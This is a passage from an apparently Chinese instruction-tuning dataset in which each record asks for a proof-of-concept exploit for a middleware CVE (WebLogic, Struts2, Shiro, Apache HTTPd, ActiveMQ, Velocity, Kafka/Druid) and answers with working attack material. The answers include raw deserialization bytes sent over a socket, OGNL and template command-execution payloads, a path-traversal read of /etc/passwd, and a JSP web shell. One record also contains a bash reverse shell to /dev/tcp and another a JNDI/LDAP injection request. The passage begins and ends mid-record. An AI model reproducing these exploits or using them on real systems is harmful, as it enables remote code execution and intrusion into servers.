'\\x00\\x00\\x09\\xf3\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\npayload += payloadObj\npayload += '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\n\n# adjust header for appropriate message length\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\n\nprint('[*] Sending payload')\nsock.send(payload)\n3. #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md"}
    275. 

  275. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-032 远程代码执行漏洞 CVE-2016-3081\n漏洞描述:Struts2在开启了动态方法调用(Dynamic Method Invocation)的情况下,可以使用`method:<name>`的方式来调用名字是`<name>`的方法,而这个方法名将会进行OGNL表达式计算,导致远程命令执行漏洞。 漏洞详情: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://www.cnblogs.com/mrchang/p/6501428.html\n影响版本:影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-3081\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-032 远程代码执行漏洞 CVE-2016-3081.md"}
    276. 

  276. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro 1.2.4反序列化漏洞 CVE-2016-4437\n漏洞描述:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。\n影响版本:``` Apache Shiro <= 1.2.4 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-4437\n【POC利用方法】\n1. Apache Shiro <= 1.2.4\n2. docker-compose up -d\n3. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 \"touch /tmp/success\" > poc.ser\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Shiro 1.2.4 反序列化漏洞 CVE-2016-4437.md"}
    277. 

  277. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 路径穿越漏洞 CVE-2021-41773\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件\n影响版本:``` Apache HTTPd 2.4.49~2.4.50版本 ```\n网络测绘:``` server=\"Apache/2.4.49\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-41773\n【POC利用方法】\n1. Apache HTTPd 2.4.49~2.4.50版本\n2. server=\"Apache/2.4.49\"\n3. /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-41773.md"}
    278. 

  278. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞 CVE-2021-40438\n漏洞描述:Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。 参考链接: - https://httpd.apache.org/security/vulnerabilities_24.html - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-40438\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://www.baidu.com/ HTTP/1.1\nHost: 192.168.1.162:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nConnection: close\n3. - https://httpd.apache.org/security/vulnerabilities_24.html\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞 CVE-2021-40438.md"}
    279. 

  279. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ任意文件写入漏洞 CVE-2016-3088\n漏洞描述:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现: 1. 其使用率并不高 2. 文件操作容易出现漏洞 所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。\n影响版本:``` Apache ActiveMQ 5.0.0 – 5.13.2 ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用 5.14.0版本以后,彻底删除fileserver ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-3088\n【POC利用方法】\n1. Apache ActiveMQ 5.0.0 – 5.13.2\nActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用\n5.14.0版本以后,彻底删除fileserver\n2. docker-compose build\ndocker-compose up -d\n3. PUT /fileserver/1.txt HTTP/1.1\nHost: 192.168.174.128:8161\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Length: 374\n\n<%\n    if(\"023\".equals(request.getParameter(\"pwd\"))){\n        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();\n        int a = -1;\n        byte[] b = new byte[2048];\n        out.print(\"<pre>\");\n        while((a=in.read(b))!=-1){\n            out.println(new String(b));\n        }\n        out.print(\"</pre>\");\n    }\n%>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ 任意文件写入漏洞 CVE-2016-3088.md"}
    280. 

  280. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ 反序列化漏洞 CVE-2015-5254\n漏洞描述:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。\n影响版本:``` Apache ActiveMQ 5.13.0之前5.x版本 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2015-5254\n【POC利用方法】\n1. Apache ActiveMQ 5.13.0之前5.x版本\n2. java -version\n3. sudo apt install openjdk-8-jdk\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md"}
    281. 

  281. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Velocity 远程代码执行 CVE-2020-13936\n漏洞描述:Velocity Uberspector无法阻止访问java.lang.ClassLoader类加载器方法。在VelocityView的上下文中使用Velocity模板时,能够修改模版的攻击者可以使用与运行Servlet容器的帐户相同的权限执行任意Java代码或运行任意系统命令。 参考链接: - https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13936\n【POC利用方法】\n1. ${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval(\"java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')\")}\n2. - https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity\n3. ${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval(\"java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')\")}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Velocity 远程代码执行 CVE-2020-13936.md"}
    282. 

  282. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194\n漏洞描述:Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。 在版本3.4.0以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性`sasl.jaas.config`的值为`com.sun.security.auth.module.JndiLoginModule`,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。 由于这个漏洞是存在于Java库kafka-clients中,所以我们需要在真实环境下找到使用了这个库的软件,且用户可以控制连接参数。 这个软件就是Apache Druid,其使用kafka-clients来连接Kafka作为其数据源之一。这篇指南就来演示如何利用CVE-2023-25194来攻击Apache Druid。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - https://github.com/projectdiscovery/nuclei-templates/blob/5d90e8275084b0ae9166ec38cacd22e5a5a94fb8/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml - https://hackerone.com/reports/1529790\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-25194\n【POC利用方法】\n1. docker-compose up -d\n2. >java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.174.1 -u\n3. POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: your-ip:8888\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/json\nContent-Length: 1792\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"ldap://your-jndi-server:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            